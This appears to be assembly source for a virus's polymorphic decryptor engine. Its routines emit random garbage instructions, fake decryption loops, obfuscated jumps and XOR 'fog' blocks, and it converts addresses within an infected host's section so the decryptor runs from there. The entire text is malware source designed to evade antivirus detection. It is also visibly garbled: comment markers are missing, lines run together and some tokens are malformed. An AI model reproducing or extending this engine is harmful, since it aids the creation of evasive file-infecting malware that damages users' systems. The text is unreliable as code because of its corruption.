; ================================================== ===========================; prepare Pointer to Memory Into Fog Block, Using XOR
; ================================================== ===========================
DOFOGXOR: CALL FOGSTART
XOR EAX, DWORD PTR [EBP XRND1]
Push EDI
Push EAX
MOV EBX, DWORD PTR [EBP XRNDREG]
MOV EDI, DWORD PTR [EBP XRNDFIXPTR]
MOV AX, 0F081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
POP EAX
Stosd
POP EDI
RET
FIXFOGXOR: PUSH EDI
MOV EDI, DWORD PTR [EBP XRNDMATH]
MOV AX, 3081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Call get_rnd32
Stosd
XOR DWORD PTR [ESI], EAX
POP EDI
RET
; ================================================== ===========================
Setup Fog Block
; ================================================== =========================== fogstart: MOV ESI, DWORD PTR [EBP CONDition_ptr]
MOV EAX, ESI
Call fromPoly2rva
RET
; ================================================== ===========================
Convert a Given Value in The Poly Decryptor To ITS Future RVA
;
On Entry:
EAX -> Value to Convert
ON EXIT:
EAX -> Converted Value
; ================================================== ===========================
FromPoly2rva: Push Edx
SUB EAX, DWORD PTR [EBP MAP_IS_HERE]
Add Eax, DWORD PTR [EBP HOST_BASE]
MOV EDX, DWORD PTR [EBP VIRUS_SH]
Sub Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]
Add Eax, DWORD PTR [EDX SH_VIRTUALADDRESS]
POP EDX
RET
; ================================================== ===========================; Product complex end
;
On Entry:
ESI -> PTRTOEP or LOOP_POINT
; ================================================== ===========================
DOCOMPLEXCMP: CALL GET_RND32
And Al, 01H
JZ JMPENDJMPREG
; ================================================== ===========
Go Using JMP IMM
; ================================================== ===========
JMPENDJMPIMM: MOV Al, 0e9h
Stosb
MOV EAX, ESI
Sub Eax, EDI
Sub Eax, 00000004H
Stosd
RET
; ================================================== ===========; Go Using Complex Escheme
; ================================================== ===========
JMPENDJMPREG: PUSH ESI
Call Get_Valid_reg
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
MOV Al, 0B8H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call get_rnd32
Stosd
Push EAX
Push EBX
Call Gengarbageex
Mov Eax, Numjmpend
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBL_JMP_END EAX * 04H]
Lodsd
Add Eax, EBP
POP EBX
POP EDX
POP ESI
Call EAX
Push EBX
Call Gengarbageex
POP EBX
Call get_rnd32
And Al, 01H
JZ endusejmpreg
Endusepushret: MOV Al, 50h
OR Al, Byte PTR [EBX REG_MASK]
Stosb
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
Call Gengarbageex
Call gen_ret
RET
EnduseJMPREG: MOV AX, 0E0FFH
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
RET
; ================================================== ===========================
; Complex end using add; ========================================================================================================================================================================================================================== =======================================================================================================================================================
JMPENDREGADD: MOV AX, 0C081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Call Extendedended
Sub Eax, EDX
Stosd
RET
; ================================================== ===========================
COMPLEX End Using Sub
; ================================================== ===========================
JMPENDREGSUB: MOV AX, 0E881H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Call Extendedended
Sub Eax, EDX
NEG EAX
Stosd
RET
; ================================================== ===========================; Complex end using
; ================================================== ===========================
JMPENDREGXOR: MOV AX, 0F081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Call Extendedended
XOR EAX, EDX
Stosd
RET
; ================================================== ===========================
COMPLEX Fixed Address
; ================================================== ===========================
Extendedend: MOV Eax, ESI
Call fromPoly2rva
RET
; ================================================== ===========================; Generate Init Garbage
; ================================================== ===========================
Geninitgarbage: MOV EAX, 00000005H
Call get_rnd_range
OR EAX, EAX
JZ EXITINITGARBAGE
MOV ECX, EAX
LOOP_G_I_G: PUSH ECX
MOV EAX, (End_i_G-TBL_I_G) / 04H
Call get_rnd_range
LEA ESI, DWORD PTR [EBP TBL_I_G EAX * 04H]
Lodsd
Add Eax, EBP
Call EAX
POP ECX
Loop loop_g_i_g
EXITINITGARBAGE: RET
; ================================================== ===========================
Generate Some Garbage Code
; ================================================== =========================== GENGARBAGEEX: MOV EAX, 00000004H
JMP Short GodirectTohell
Gen_Garbage: MOV EAX, 00000002H
GodirectTohell: Push ECX
PUSH ESI
Inc Byte Ptr [EBP Recursive_Level]
Call get_rnd_range
INC EAX
INC EAX
MOV ECX, EAX
LOOP_GARBAGE: PUSH ECX
MOV EAX, (end_garbage-tbl_garbage) / 04H
CMP BYTE PTR [EBP Recursive_level], 06H
JAE TOO_MUCH_SHIT
CMP BYTE PTR [EBP Recursive_level], 02H
JB OK_GEN_NUM
MOV EAX, (Save_Space-TBL_GARBAGE) / 04H
OK_GEN_NUM: CALL GET_RND_RANGE
LEA ESI, DWORD PTR [EBP TBL_GARBAGE EAX * 04H]
Lodsd
Add Eax, EBP
Call EAX
TOO_MUCH_SHIT: POP ECX
Loop loop_garbage
; ================================================== ===========
Update Recursive Level
; ================================================== ===========
EXIT_GG: DEC BYTE PTR [EBP Recursive_Level]
POP ESI
POP ECX
RET
; ================================================== ===========================; Generate Mov Reg, IMM
; ================================================== ===========================
; ================================================== ===========
Generate Mov Reg32, IMM
; ================================================== ===========
g_movreg32imm: Call get_valid_reg
MOV Al, 0B8H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call get_rnd32
Stosd
RET
; ================================================== ===========; Generate Mov reg16, IMM
; ================================================== ===========
g_movreg16imm: Call get_valid_reg
MOV AX, 0B866H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Call get_rnd32
Stosw
RET
; ================================================== ===========
Generate Mov Reg8, IMM
; ================================================== ===========
g_movreg8imm: Call get_valid_reg
TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_MOVREG8IMM
Call get_rnd32
MOV Al, 0B0H
OR Al, Byte PTR [EBX REG_MASK]
Push EAX
Call get_rnd32
POP EDX
And Ax, 0004H
OR AX, DX
Stosw
A_MOVREG8IMM: RET
; ================================================== ===========================; Generate Mov REG, REG
; ================================================== ===========================
g_movregream32: Call get_rnd_reg
Push EBX
Call Get_Valid_reg
POP EDX
CMP EBX, EDX
JE A_MOVREGREG32
C_MoVRegreg32: Mov Al, 8BH
h_movregreg32: Mov Ah, Byte PTR [EBX REG_MASK]
SHL AH, 03H
OR AH, BYTE PTR [EDX REG_MASK]
OR AH, 0C0H
Stosw
A_MOVREGREG32: RET
g_movregream16: Call get_rnd_reg
Push EBX
Call Get_Valid_reg
POP EDX
CMP EBX, EDX
JE A_MOVREGREG32
MOV Al, 66H
Stosb
JMP short c_movregream32
g_movregream8: Call get_rnd_reg
TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_MOVREGREG8
Push EBX
Call Get_Valid_reg
POP EDX
MOV Al, 8ah
H_Movregreg8: Test Byte Ptr [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_MOVREGREG8
CMP EBX, EDX
JE A_MOVREGREG8
MOV AH, BYTE PTR [EBX REG_MASK]
SHL AH, 03H
OR AH, BYTE PTR [EDX REG_MASK]
OR AH, 0C0H
Push EAX
Call get_rnd32
POP EDX
And Ax, 2400h
OR AX, DX
Stosw
A_MOVREGREG8: RET
; ================================================== ===========================; Generate Xchg Reg, REG
; ================================================== ===========================
g_xchgregream32: call get_valid_reg
Push EBX
Call Get_Valid_reg
POP EDX
CMP EBX, EDX
JE A_MOVREGREG32
H_xchgregreg32: Mov Al, 87h
JMP H_MOVREGREG32
g_xchgregream16: Call get_valid_reg
Push EBX
Call Get_Valid_reg
POP EDX
CMP EBX, EDX
JE A_MOVREGREG32
MOV Al, 66H
Stosb
JMP Short H_xchgregREG32
g_xchgregream8: Call get_valid_reg
TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_MOVREGREG8
Push EBX
Call Get_Valid_reg
POP EDX
MOV Al, 86H
JMP H_MOVREGREG8
; ================================================== ===========================
Generate Movzx / Movsx Reg32, Reg16
; ================================================== =========================== g_movzx_movsx: Call get_rnd32
MOV AH, 0B7H
And Al, 01H
JZ D_MOVZX
MOV AH, 0BFH
D_Movzx: MOV Al, 0FH
Stosw
Call get_rnd_reg
Push EBX
Call Get_Valid_reg
POP EDX
MOV Al, Byte PTR [EBX REG_MASK]
SHL Al, 03H
OR Al, 0C0H
OR Al, Byte PTR [EDX REG_MASK]
Stosb
RET
; ================================================== ===========================
Generate Inc REG
; ================================================== ===========================
g_inc_reg32: Call Get_Valid_REG
MOV Al, 40h
OR Al, Byte PTR [EBX REG_MASK]
Stosb
RET
g_inc_reg16: MOV Al, 66H
Stosb
JMP short g_inc_reg32
g_inc_reg8: Call Get_Valid_REG
TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_INC_REG8
Call get_rnd32
And Ah, 04H
OR AH, BYTE PTR [EBX REG_MASK]
OR AH, 0C0HMOV Al, 0FEH
Stosw
A_inc_reg8: RET
; ================================================== ===========================
Generate Dec REG
; ================================================== ===========================
g_dec_reg32: Call Get_Valid_reg
MOV Al, 48h
OR Al, Byte PTR [EBX REG_MASK]
Stosb
RET
g_dec_reg16: MOV Al, 66H
Stosb
JMP Short G_Dec_reg32
g_dec_reg8: Call Get_Valid_Reg
TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_DEC_REG8
Call get_rnd32
And Ah, 04H
OR AH, BYTE PTR [EBX REG_MASK]
OR AH, 0C8H
Mov Al, 0FEH
Stosw
A_DEC_REG8: RET
; ================================================== ===========================
Genereate Add / Sub / xor / or / and reg, IMM
; ================================================== =========================== g_mathregimm32: MOV Al, 81H
Stosb
Call Get_Valid_reg
Call do_math_work
Stosd
RET
g_mathregimm16: MOV AX, 8166H
Stosw
Call Get_Valid_reg
Call do_math_work
Stosw
RET
g_mathregimm8: Call get_valid_reg
TEST BYTE PTR [EBX REG_FLAGS], REG_NO_8BIT
JNZ A_MATH8
MOV Al, 80h
Stosb
Call do_math_work
Stosb
And Ah, 04H
Or Byte Ptr [EDI-00000002H], AH
A_MATH8: RET
Do_math_Work: MOV EAX, END_MATH_IMM-TBL_MATH_IMM
Call get_rnd_range
LEA ESI, DWORD PTR [EBP EAX TBL_MATH_IMM]
Lodsb
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call get_rnd32
RET
; ================================================== ===========================
Generate Decryption Instructions (Real or Fake ")
; ================================================== ===========================; ===================================================================================================================================================== =======================================
Check if we are going to use a dispablement in the
Indexing Mode
; ================================================== ===========
FAKE_OR_NOT: MOV EAX, DWORD PTR [EBP FAKE_PTR_DISP]
OR EAX, EAX
JNZ more_complex
; ================================================== ===========
Choose Generator for [REG] Indexing Mode
; ================================================== =========== Mov Edx, Offset TBL_IDX_REG
Call choose_magic
JMP you_got_it
; ================================================== ===========
More fun?!?!
; ================================================== ===========
More_complex: MOV Al, Byte Ptr [EBP FAKE_BUILD_FLAGS]
Test Al, Crypt_SIMPLEX
JNZ Crypt_Xtended
; ================================================== ===========
Choose Generator for [REG IMM] Indexing Mode
; ================================================== ===========
MOV EDX, OFFSET TBL_DIS_REGCALL CHOOSE_MAGIC
; ================================================== ===========
Use Magic to Convert Some Values Into
DESIRED INSTRUCTIONS
; ================================================== ===========
YOU_GOT_IT: CALL SIZE_CORRECT
MOV DL, BYTE PTR [EBP FAKE_INDEX_MASK]
Lodsb
OR Al, Al
JNZ ADN_REG_01
CMP DL, 00000101B
JE ADN_REG_02
ADN_REG_01: LODSB
OR Al, DL
Stosb
JMP Common_PART
ADN_REG_02: LODSB
Add Al, 45H
XOR AH, AH
Stosw
JMP Common_PART
; ================================================== ===========
Choose [REG REG] OR [REG REG DISP]
; ================================================== ===========
Crypt_Xtended: xor Eax, EAX
MOV DWORD PTR [EBP DISP2DISP], EAX; CLEAR DISP-over-Disp
Test Al, Crypt_Complex
JZ OK_COMPLEX; =============================================== =============
; Get Random Displacement from Current Displacement
Eeehh ?!?
; ================================================== ===========
MOV EAX, 00001000H
Call get_rnd_range
MOV DWORD PTR [EBP DISP2DISP], EAX
Call load_aux
Push EBX
Call Gengarbageex
; ================================================== ===========
Choose Generator for [REG REG IMM] Indexing Mode
; ================================================== ===========
Mov Edx, Offset TBL_PARANOIA
Call choose_magic
JMP short done_xtended
OK_COMPLEX: MOV EAX, DWORD PTR [EBP FAKE_PTR_DISP]
Call load_aux
Push EBX
Call Gengarbageex
; ================================================== ===========; Choose Generator for [REG REG] Indexing Mode
; ================================================== ===========
Mov Edx, Offset TBL_XTENDED
Call choose_magic
; ================================================== ===========
Build Decryptor Instructions
; ================================================== ===========
DONE_XTENDED: CALL SIZE_CORRECT
POP EBX
MOV DL, BYTE PTR [EBP FAKE_INDEX_MASK]
Lodsb
MOV CL, Al
OR Al, Al
JNZ ARN_REG_01
CMP DL, 00000101B
JNE ARN_REG_01
Lodsb
Add Al, 40h
Stosb
JMP Short ARN_REG_02
ARN_REG_01: MOVSB
ARN_REG_02: MOV AL, BYTE PTR [EBX REG_MASK]
SHL Al, 03H
OR Al, DL
Stosb
OR CL, CL
JNZ ARN_REG_03
CMP DL, 00000101B
JNE ARN_REG_03
XOR Al, Al
Stosb
; ================================================== ===========; Restore Aux Reg State
; ================================================== ===========
ARN_REG_03: XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
; ================================================== ===========
; Get Post-Build Flags
; ================================================== ===========
Common_part: Lodsb
; ================================================== ===========
Insert Displacement from Real Address?
; ================================================== =========== Test Al, Magic_putdisp
JZ SKIP_DISP
Push EAX
MOV EAX, DWORD PTR [EBP FAKE_PTR_DISP]
SUB EAX, DWORD PTR [EBP DISP2DISP]
NEG EAX
Stosd
POP EAX
; ================================================== ===========
Insert Key?
; ================================================== ===========
Skip_disp: Test Al, Magic_putKey
JZ Skip_Key
Call Copy_Key
Skip_key: Ret
; ================================================== ===========================
Choose a Magic Generator
; ================================================== =========================== cose_magic: MOV EAX, 00000006H
Call get_rnd_range
Add Edx, EBP
Lea ESI, DWORD PTR [EDX EAX * 04H]
Lodsd
Add Eax, EBP
Mov ESI, EAX
RET
; ================================================== ===========================
DO OPERAND SIZE CORRECTION
; ================================================== ===========================
SIZE_CORRECT: LODSB
MOV AH, BYTE PTR [EBP FAKE_OPER_SIZE]
CMP AH, 01H
Je store_correct
INC Al
CMP AH, 04H
Je store_correct
MOV AH, 66H
XCHG AH, Al
Stosw
RET
Store_CorRect: Stosb
RET
; ================================================== ===========================; Load aux reg with displacement
; ================================================== ===========================
; ================================================== ===========
Get a valid auxiliary register
; ================================================== ===========
LOAD_AUX: PUSH EAX
Call Get_Valid_reg
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
; ================================================== ===========; Move Displacement Into aux reg
; ================================================== ===========
MOV Al, 0B8H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
POP EAX
NEG EAX
Stosd
RET
; ================================================== ===========================
Generate Push REG GARBAGE POP REG
; ================================================== ===========================
g_push_g_pop: Call Gen_Garbage
Call get_rnd32
Test Al, 01H
JNZ SKIP_SP_PUSH
Call Push_With_SP
JMP Short from_push
Skip_sp_push: Call get_rnd_reg
MOV Al, 50H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call gen_garbagefrom_push: Call get_rnd32
Test Al, 01H
JZ pop_with_sp
Call Get_Valid_reg
MOV Al, 58H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call gen_garbage
RET
; ================================================== ===========================
Emulate a push instruction, Using Sub ESP, 00000004H
; ================================================== ===========================
Push_with_sp: MOV Eax, 0004EC83H
Stosd
Dec Edi
Call Gengarbageex
RET
; ================================================== ===========================
Emulate a pop instruction, using add esp, 00000004H
; ================================================== =========================== Pop_with_sp: MOV EAX, 0004C483H
Stosd
Dec Edi
Call Gengarbageex
RET
; ================================================== ===========================
Generate Ret in Different Ways
; ================================================== ===========================
GEN_RET: CALL GET_RND32
And Al, 01H
JNZ Just_Ret
Call Get_Valid_reg
MOV Al, 58H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
Push EBX
Call Gengarbageex
POP EBX
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
MOV AX, 0E0ffH
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
RET
Just_ret: MOV Al, 0C3H
Stosb
RET
; ================================================== ===========================; Generate Call without return
; ================================================== ===========================
g_call_cont: MOV Al, 0e8h
Stosb
Push EDI
Stosd
Call gen_rnd_block
POP EDX
Mov Eax, EDI
Sub Eax, EDX
Sub Eax, 00000004H
Mov DWORD PTR [EDX], EAX
Call Gengarbageex
Call get_rnd32
Test Al, 01H
JZ pop_with_sp
Call Get_Valid_reg
MOV Al, 58H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call gen_garbage
RET
; ================================================== ===========================
Generate Unconditional Jumps
; ================================================== =========================== g_jump_u: MOV Al, 0e9h
Stosb
Push EDI
Stosd
Call gen_rnd_block
POP EDX
Mov Eax, EDI
Sub Eax, EDX
Sub Eax, 00000004H
Mov DWORD PTR [EDX], EAX
Call Gengarbageex
RET
g_save_jump: MOV Al, 0e9h
Stosb
Push EDI
Stosd
Call gen_rnd_block
POP EDX
Mov Eax, EDI
Sub Eax, EDX
Sub Eax, 00000004H
Mov DWORD PTR [EDX], EAX
RET
; ================================================== ===========================
Generate Conditional Jumps
; ================================================== ===========================
g_jump_c: Call get_rnd32
And Ah, 0FH
Add Ah, 80h
Mov Al, 0FH
Stosw
Push EDI
Stosd
Call Gengarbageex
POP EDX
Mov Eax, EDI
Sub Eax, EDX
Sub Eax, 00000004H
Mov DWORD PTR [EDX], EAX
Call Gengarbageex
RET
g_save_jump_c: Call get_rnd32
And Ah, 0FH
Add Ah, 80h
Mov Al, 0FH
Stosw
XOR EAX, EAX
Stosd
RET
; ================================================== ===========================
Generate MOV [MEM], REG
; ================================================== ===========================
GEN_MOV_MEM8: MOV DL, 88H
JMP MEM8WR
GEN_MOV_MEM16: MOV Al, 66H
Stosb
GEN_MOV_MEM32: MOV DL, 89H
JMP Gen_Mem_Wr
GEN_ADD_MEM8: MOV DL, 00H
JMP MEM8WR
GEN_ADD_MEM16: MOV Al, 66H
Stosb
GEN_ADD_MEM32: MOV DL, 01H
JMP Gen_Mem_Wr
Gen_sub_mem8: MOV DL, 28H
JMP MEM8WR
Gen_sub_mem16: MOV Al, 66H
Stosb
Gen_sub_mem32: MOV DL, 29H
JMP Gen_Mem_Wr
GEN_ADC_MEM8: MOV DL, 10H
JMP MEM8WR
GEN_ADC_MEM16: MOV Al, 66H
Stosb
GEN_ADC_MEM32: MOV DL, 11H
JMP Gen_Mem_Wr
GEN_SBB_MEM8: MOV DL, 18H
JMP MEM8WR
GEN_SBB_MEM16: MOV Al, 66H
Stosb
GEN_SBB_MEM32: MOV DL, 19H
JMP Gen_Mem_Wr
GEN_OR_MEM8: MOV DL, 08H
JMP MEM8WR
GEN_OR_MEM16: MOV Al, 66H
Stosb
GEN_OR_MEM32: MOV DL, 09H
JMP Gen_Mem_Wr
GEN_AND_MEM8: MOV DL, 20H
JMP MEM8WR
GEN_AND_MEM16: MOV Al, 66H
Stosb
GEN_AND_MEM32: MOV DL, 21H
JMP Gen_Mem_Wr
GEN_XOR_MEM8: MOV DL, 30H
JMP MEM8WR
GEN_XOR_MEM16: MOV Al, 66H
Stosb
GEN_XOR_MEM32: MOV DL, 31H
JMP gen_mem_wrmem8wr: Call Gen_Mem_Wr
Call get_rnd32
And Al, 20h
Al byte PTR [EDI-00000005H], Al
RET
GEN_MEM_WR: CALL GET_RND_REG
MOV AH, BYTE PTR [EBX REG_MASK]
OR AH, AH
JNZ SKIP_WR_EAX
CMP DL, 88H
JE GEN_MEM_WR
CMP DL, 89H
JE GEN_MEM_WR
SKIP_WR_EAX: SHL AH, 03H
OR AH, 05H
MOV Al, DL
Stosw
Movzx Eax, Byte PTR [EBP NumberofDataareas]]
Call get_rnd_range
Lea ESI, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]
Lodsd
Push EAX
Lodsd
Sub Eax, 00000004H
Call get_rnd_range
POP EDX
Add Eax, EDX
Stosd
RET
; ================================================== ===========================
Generate CLC / STC / CMC / CLD / STD
; ================================================== ===========================
Gen_save_code: MOV EAX, END_SAVE_CODE-TBL_SAVE_CODE
Call get_rnd_range
MOV Al, Byte PTR [EBP TBL_SAVE_CODE EAX]
Stosb
RET
; ================================================== ===========================; Generate Fake Decrypt Instructions
; ================================================== ===========================
Gen_fake_crypt: CMP BYTE PTR [EBP Recursive_level], 03H
JAE BAD_FAKE_SIZE
CMP BYTE PTR [EBP NUMBEROFDataAreas], 02H
JB BAD_FAKE_SIZE
Push DWORD PTR [EBP FAKE_PTR_DISP]
Push DWORD PTR [EBP FAKE_CRYPT_KEY]
MOV DL, BYTE PTR [EBP FAKE_BUILD_FLAGS]
MOV DH, BYTE PTR [EBP FAKE_DEX_MASK]
SHL EDX, 08H
MOV DL, BYTE PTR [EBP FAKE_OPER_SIZE]
Push Edx
Call Get_rnd32; Get Encryption Key
MOV DWORD PTR [EBP FAKE_CRYPT_KEY], EAX
Call get_rnd32; get generation flags
MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al
Call get_rnd32; get size of mem operand
And Al, 03H
CMP Al, 01H
JE OK_FAKE_SIZE
CMP Al, 02H
JE OK_FAKE_SIZE
INC Al
OK_FAKE_SIZE: MOV BYTE PTR [EBP FAKE_OPER_SIZE], Al
Call get_rnd32; choose displacement
And Eax, 00000001H
JZ OK_FAKE_DISP
Call get_rnd32
Call get_rnd_range
INC EAX
NEG EAX
OK_FAKE_DISP: MOV DWORD PTR [EBP FAKE_PTR_DISP], EAX
Movzx Eax, Byte PTR [EBP NumberofDataareas]]
Call get_rnd_rangelea ESI, DWORD PTR [EBP TBL_DATA_AREA EAX * 08H]
Lodsd
Add Eax, DWORD PTR [EBP FAKE_PTR_DISP]
Push EAX
Lodsd
Sub Eax, 00000004H
Call get_rnd_range
POP EDX
Add Eax, EDX
Push EAX
Call Get_Valid_reg
OR BYTE PTR [EBX REG_FLAGS], REG_IS_INDEX
MOV Al, Byte PTR [EBX REG_MASK]
MOV BYTE PTR [EBP FAKE_INDEX_MASK], Al
OR Al, 0B8H
Stosb
POP EAX
Stosd
Push EBX
Call Gengarbageex; Garbage
Call fake_or_not
Call Gengarbageex; Garbage
POP EBX
XOR BYTE PTR [EBX REG_FLAGS], REG_IS_INDEX
POP EAX
MOV BYTE PTR [EBP FAKE_OPER_SIZE], Al
SHR EAX, 08H
MOV BYTE PTR [EBP FAKE_INDEX_MASK], AH
MOV BYTE PTR [EBP FAKE_BUILD_FLAGS], Al
POP DWORD PTR [EBP FAKE_CRYPT_KEY]
POP DWORD PTR [EBP FAKE_PTR_DISP]
Bad_fake_size: Ret
; ================================================== ===========================
Get a ramdom REG
; ================================================== ===========================
GET_RND_REG: MOV EAX, 00000007H
Call get_rnd_range
LEA EBX, DWORD PTR [EBP TBL_REGS EAX * 02H]
RET
; ================================================== ===========================; Get a Ramdom REG (Avoid REG_READ_ONLY, REG_IS_COUNTER AND REG_IS_IDEX)
; ================================================== ===========================
GET_VALID_REG: CALL GET_RND_REG
MOV Al, Byte PTR [EBX REG_FLAGS]
And Al, REG_IS_INDEX or REG_IS_COUNTER or REG_READ_ONLY
Jnz get_valid_reg
RET
; ================================================== ===========================
; Load ecx with crypt_size / Oper_Size
; ================================================== ================================================================================================================= # e
XOR ECX, ECX
MOV CL, BYTE PTR [EBP OPER_SIZE]
SHR ECX, 01H
OR ECX, ECX
JZ ok_2ecx
SHR EAX, CL
JNC OK_2ECX
INC EAX
OK_2ecx: MOV ECX, EAX
RET
; ================================================== ===========================
: Generate Polymorphic Decryptor ... Whats new on this poly engine? "WHATE NEW ON THIS POLY ENGINE?
;
On Entry:
; esi -> Pointer to Code
; EDI -> Where to Generate Polymorphic Decryptor
; ECX -> Size of Area To Encrypt
Edx -> Entry Point To Code ONCE DECRYPTED
ON EXIT:
ECX -> Decryptor Size
; EDI -> End of Decryptor
;
; ================================================== ===========================
MUTATE: PUSH EBX; Save Base Address
Add Edx, EBX
MOV DWORD PTR [EBP PTRTOEP], EDX; Save Ptr To Entry-PointMov DWORD PTR [EBP PTRTOCRYPT], ESI; Save Crypt Offset
MOV DWORD PTR [EBP PTRTODECRYPT], EDI
MOV DWORD PTR [EBP SIZECRYPT], ECX; Save Size of Block
LEA ESI, DWORD PTR [EBP TBL_STARTUP]
Lea EDI, DWORD PTR [EBP TBL_REGS REG_FLAGS]
MOV ECX, 00000007H
LOOP_INIT_REGS: LODSB
Stosb
Inc EDI
Loop loop_init_regs
XOR EAX, EAX
MOV BYTE PTR [EBP NumberofDataAreas], Al; Clear # of Data Area
MOV BYTE PTR [EBP Recursive_level], Al; Clear Recursive
MOV ECX, NUM_DA
Lea EDI, DWORD PTR [EBP TBL_DATA_AREA]; Init Data Areas
LOOP_INIT_DA: StOSD
Stosd
Loop loop_init_da
Call Get_Valid_reg
MOV Al, Byte PTR [EBX REG_MASK]
MOV BYTE PTR [EBP INDEX_MASK], Al
OR BYTE PTR [EBX REG_FLAGS], REG_IS_INDEX
XOR EAX, EAX
MOV ECX, 00000005H
Lea EDI, DWORD PTR [EBP STYLE_TABLE 00000004H]
Clear_Style: Stosd
Add EDI, 00000004H
Loop clear_style
Call Get_Valid_reg
MOV Al, Byte PTR [EBX REG_MASK]
MOV BYTE PTR [EBP Counter_Mask], Al
OR BYTE PTR [EBX REG_FLAGS], REG_IS_CUNTER
Call get_rnd32
And Eax, 00000001H
JZ ok_disp
Call get_rnd32
OK_DISP: MOV DWORD PTR [EBP PTR_DISP], EAX
Call get_rnd32
MOV DWORD PTR [EBP CRYPT_KEY], EAX
Call get_rnd32
MOV BYTE PTR [EBP BUILD_FLAGS], Al
Call get_rnd32
And Al, 03H
CMP Al, 01H
JE get_size_ok
CMP Al, 02H
JE get_size_ok
INC Al
GET_SIZE_OK: MOV BYTE PTR [EBP OPER_SIZE], Al
MOV EDI, DWORD PTR [EBP PTRTODECRYPT]; PTR to Decryptor
Call gen_rnd_block; random data block
MOV ECX, 00000005H; Generate 5 Routines
Do_suBroutine: Push ECX
Routine_done: MOV EAX, 00000005H; Random STEP
Call get_rnd_range
Lea ESI, DWORD PTR [EBP STYLE_TABLE EAX * 08H]
XOR EDX, EDX; ALREADYGENERATED? CMP DWORD PTR [ESI 00000004H], EDX
JNE ROUTINE_DONE
Push EDI; Generate Routine
Call Gengarbageex
Lodsd
POP DWORD PTR [ESI]
Add Eax, EBP
Call EAX
Call Gengarbageex
Call gen_ret
Call gen_rnd_block
POP ECX; Generate Next Subroutine
Loop do_subroutine
MOV DWORD PTR [EBP Entry_Point], EDI; DECRYPTOR Entry-Point
; ================================================== ===========
; If this is the 1st Decryptor We need to save
Some Regs
; ================================================== ===========
CMP BYTE PTR [EBP ISFIRST], 00H
Je SkipsAveRegs
Mov al, reg_read_only
Or Byte PTR [EBP TBL_REG_EBX 01H], Al
Or byte PTR [EBP TBL_REG_ESI 01H], Al
Or Byte PTR [EBP TBL_REG_EDI 01H], Al
Or byte PTR [EBP TBL_REG_EBP 01H], Al
MOV BYTE PTR [EBP Recursive_Level], 04H
MOV ECX, 00000004H
Lea ESI, DWORD PTR [EBP PSHPSTEPINDEX]
Dorestorepush: Push ECX
PUSH ESI
Call Geninitgarbage
POP ESI
Lodsd
Lea EDX, DWORD PTR [EBP EAX TBLDOPUSH]
Mov Al, Byte Ptr [EDX]
Stosb
MOV DL, NOT REG_READ_ONLY
Trytofixebx: CMP Al, 053H
JNE Trytofixesi
And Byte PTR [EBP TBL_REG_EBX 01H], DL
JMP ShitisFixed
Trytofixesi: CMP Al, 056H
JNETYTOFIXEDI
And Byte PTR [EBP TBL_REG_ESI 01H], DLJMP ShitisFixed
Trytofixedi: CMP Al, 057h
JNE Trytofixebp
And Byte PTR [EBP TBL_REG_EDI 01H], DL
JMP ShitisFixed
Trytofixebp: CMP Al, 055H
Jne Shitisfixed
AND BYTE PTR [EBP TBL_REG_EBP 01H], DL
Shitisfixed: POP ECX
Loop Dorestorepush
MOV BYTE PTR [EBP Recursive_level], 00H
And Byte PTR [EBP TBL_REG_EBX 01H], DL
AND BYTE PTR [EBP TBL_REG_ESI 01H], DL
And Byte PTR [EBP TBL_REG_EDI 01H], DL
AND BYTE PTR [EBP TBL_REG_EBP 01H], DL
; ================================================== ===========
... Build The JZ / JNZ Instruction (at the end of the decryptor
; loop) at runtime
; ================================================== ===========
SkipsAveRegs: Call Gengarbageex
TEST BYTE PTR [EBP Build_Flags], Crypt_fog
JZ NOENDFOG
Fuckfogebp: Call get_valid_reg
CMP BYTE PTR [EBX REG_MASK], 00000101B
Je fuckfogebp
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
MOV DWORD PTR [EBP XRNDREG], EBX
Push EBX
MOV Al, Byte PTR [EBX REG_MASK]
OR Al, 0B8H
Stosb
Call get_rnd32
Stosd
MOV DWORD PTR [EBP XRND1], EAX
Call Gengarbageex
MOV DWORD PTR [EBP XRNDFIXPTR], EDI
Add EDI, 00000006H
Call gen_garbage
MOV DWORD PTR [EBP XRNDMATH], EDI
Add EDI, 00000006HPOP EBX
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
Call gen_garbage
; ================================================== ===========
Generate Calls to Each Routine Inside Garbage Code
; ================================================== ===========
NOENDFOG: Lea ESI, DWORD PTR [EBP STYLE_TABLE 00000004H]
MOV ECX, 00000005H
Do_Call: Push Ecx; Gen Call to Each Step
CMP ECX, 00000003H
JNE IS_NOT_LOOP
Call Gengarbageex
